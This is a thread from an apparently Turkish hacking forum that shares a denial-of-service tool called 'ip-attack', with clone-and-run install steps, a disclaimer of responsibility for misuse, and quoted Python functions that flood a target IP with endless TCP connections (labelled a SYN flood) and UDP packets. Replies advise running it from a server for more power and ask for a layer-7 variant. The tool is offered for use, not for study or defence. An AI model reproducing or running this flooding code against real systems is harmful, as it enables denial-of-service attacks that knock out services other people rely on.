
Bu Aracın yanlışa ve kötüye Kullanımında Türk Hack Team ailemiz ve Ben Sorumlu Degilim
Kurulum
git clone GitHub - Kaizer-33/ip-attack
cd ip-attack
python main.py
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.

Başlığı kaydettim en yakın zamanda bir göz gezdireceğim hocam
Bu Aracın yanlışa ve kötüye Kullanımında Türk Hack Team ailemiz ve Ben Sorumlu Degilim
Kurulum
git clone GitHub - Kaizer-33/ip-attack
cd ip-attack
python main.py
TesekkurlerBaşlığı kaydettim en yakın zamanda bir göz gezdireceğim hocam![]()
![]()
def syn_flood_attack(self): while True: try: src_port = random.randint(1024, 65535) syn_packet = f"GET / HTTP/1.1\r\nHost: {self.target_ip}\r\nPort: {src_port}\r\n\r\n" bot_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) bot_socket.connect((self.target_ip, self.target_port)) bot_socket.sendall(syn_packet.encode()) bot_socket.close() self.attack_queue.put(1) except Exception as e: print(Fore.RED + f" Hata Oluştu: {e}\n") break def udp_flood_attack(self): while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(b'XChoice', (self.target_ip, self.target_port)) self.attack_queue.put(1) except Exception as e: print(Fore.RED + f" Hata Oluştu: {e}\n")
Tesekkurler hocamTool'u biraz inceledim ama bir not bırakmak istiyorum.Bu tip araçları bilgisayar üzerinde kullanmamanızı öneririm.İlerde CPU sorunu çekebilirsiniz.
Araçta SYN Flood ve ve Udp Flood attack var. Bu kısım normal kullanıcı bilgisayarlarını zorlar.Bir Windows Server 2012 kurup kullanmanızı öneririm.
Bir Sunucu üzerinde daha sağlıklı ve tedbirli çalışır.Ellerine sağlık
Python:def syn_flood_attack(self): while True: try: src_port = random.randint(1024, 65535) syn_packet = f"GET / HTTP/1.1\r\nHost: {self.target_ip}\r\nPort: {src_port}\r\n\r\n" bot_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) bot_socket.connect((self.target_ip, self.target_port)) bot_socket.sendall(syn_packet.encode()) bot_socket.close() self.attack_queue.put(1) except Exception as e: print(Fore.RED + f" Hata Oluştu: {e}\n") break def udp_flood_attack(self): while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(b'XChoice', (self.target_ip, self.target_port)) self.attack_queue.put(1) except Exception as e: print(Fore.RED + f" Hata Oluştu: {e}\n")
hocam layer7 lazım
Bu Aracın yanlışa ve kötüye Kullanımında Türk Hack Team ailemiz ve Ben Sorumlu Degilim
Kurulum
git clone GitHub - Kaizer-33/ip-attack
cd ip-attack
python main.py
Ben termuxta kullandigim icin python main.py yazdımmı acılıyorhocam layer7 lazım